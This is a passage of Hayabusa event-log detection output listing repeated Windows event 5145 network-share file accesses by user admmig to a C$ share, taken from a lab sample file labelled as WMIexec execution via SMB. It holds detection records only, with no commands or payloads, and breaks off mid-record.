20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 